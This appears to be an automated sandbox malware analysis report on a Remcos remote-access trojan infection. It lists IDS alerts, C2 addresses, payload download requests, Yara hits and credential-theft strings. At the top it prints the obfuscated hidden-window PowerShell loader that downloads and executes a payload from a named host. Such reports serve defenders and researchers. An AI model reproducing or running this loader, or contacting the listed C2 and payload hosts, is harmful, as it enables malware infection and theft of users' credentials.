                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Dark 'Brav$SummGSyger buluVitan Xerd danvCangoStamlK ut

                Stealing of Sensitive Information

                barindex
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1948, TargetFilename: C:\ProgramData\remcos\logs.dat
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T09:22:56.607494+010020365941Malware Command and Control Activity Detected192.168.2.652104143.244.46.15051525TCP
                2024-10-28T09:22:58.591894+010020365941Malware Command and Control Activity Detected192.168.2.652115143.244.46.15051525TCP
                2024-10-28T09:26:00.045259+010020365941Malware Command and Control Activity Detected192.168.2.652139143.244.46.15051525TCP
                2024-10-28T09:26:00.045317+010020365941Malware Command and Control Activity Detected192.168.2.652140143.244.46.15051525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T09:22:52.877001+010020327761Malware Command and Control Activity Detected192.168.2.652090143.244.46.15051525TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T09:22:58.381563+010028033043Unknown Traffic192.168.2.652116178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T09:22:36.354723+010028032702Potentially Bad Traffic192.168.2.65200237.230.62.86443TCP
                2024-10-28T09:22:41.422587+010028032702Potentially Bad Traffic192.168.2.652023104.21.56.189443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Yara matchFile source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: unknownHTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:52002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:52023 version: TLS 1.2
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*/1L source: msiexec.exe, 00000013.00000002.2741454011.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*h# source: msiexec.exe, 00000013.00000002.2741454011.0000000002B17000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbDp source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: tem.Core.pdb( source: powershell.exe, 00000005.00000002.2436956991.00000000078E9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2436956991.00000000078C4000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040AE51 FindFirstFileW,FindNextFileW,18_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407898
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:52090 -> 143.244.46.150:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52104 -> 143.244.46.150:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52115 -> 143.244.46.150:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52140 -> 143.244.46.150:51525
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:52139 -> 143.244.46.150:51525
                Source: unknownDNS query: name: odinga.duckdns.org
                Source: unknownDNS query: name: updated212.duckdns.org
                Source: global trafficTCP traffic: 192.168.2.6:52090 -> 143.244.46.150:51525
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:52116 -> 178.237.33.50:80
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52002 -> 37.230.62.86:443
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:52023 -> 104.21.56.189:443
                Source: global trafficHTTP traffic detected: GET /Misforstaaelserne.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /Misforstaaelserne.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: evesecret.maCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /eYyaWC130.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: plieltd.topCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000012.00000002.2745228317.0000000004CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000012.00000002.2745228317.0000000004CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: evesecret.ma
                Source: global trafficDNS traffic detected: DNS query: plieltd.top
                Source: global trafficDNS traffic detected: DNS query: odinga.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: updated212.duckdns.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000005.00000002.2436956991.0000000007890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000002.00000002.2297010038.0000014FF9539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mx
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F81D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://evesecret.ma
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                Source: msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp;
                Source: msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpeiX
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpo
                Source: msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
                Source: powershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhv2369.tmp.18.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhv2369.tmp.18.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000014.00000003.2729547178.00000000034CD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2729523881.00000000034CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.compData
                Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: msiexec.exe, 00000012.00000002.2744526417.0000000002EA4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv2369.tmp.18.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                Source: bhv2369.tmp.18.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv2369.tmp.18.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv2369.tmp.18.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhv2369.tmp.18.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhv2369.tmp.18.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2413093891.0000000004C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhv2369.tmp.18.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhv2369.tmp.18.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
                Source: bhv2369.tmp.18.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv2369.tmp.18.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhv2369.tmp.18.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv2369.tmp.18.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2262684973.0000014F818D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evesecret.ma
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F8022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evesecret.ma/Misforstaaelserne.psmP
                Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://evesecret.ma/Misforstaaelserne.psmXRdl
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?0684adfa5500b3bab63593997d26215c
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-afd.azureedge.net/apc/trans.gif?79b1312614e5ac304828ba5e1fdb4fa3
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7ae939fc98ce1346dd2e496abdba2d3b
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?9f3db9405f1b2793ad8d8de9770248e4
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?4aec53910de6415b25f2c4faf3f7e54a
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?77290711a5e44a163ac2e666ad7b53fd
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                Source: bhv2369.tmp.18.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000005.00000002.2413093891.0000000004DD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2262684973.0000014F80BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhv2369.tmp.18.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv2369.tmp.18.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: bhv2369.tmp.18.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv2369.tmp.18.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
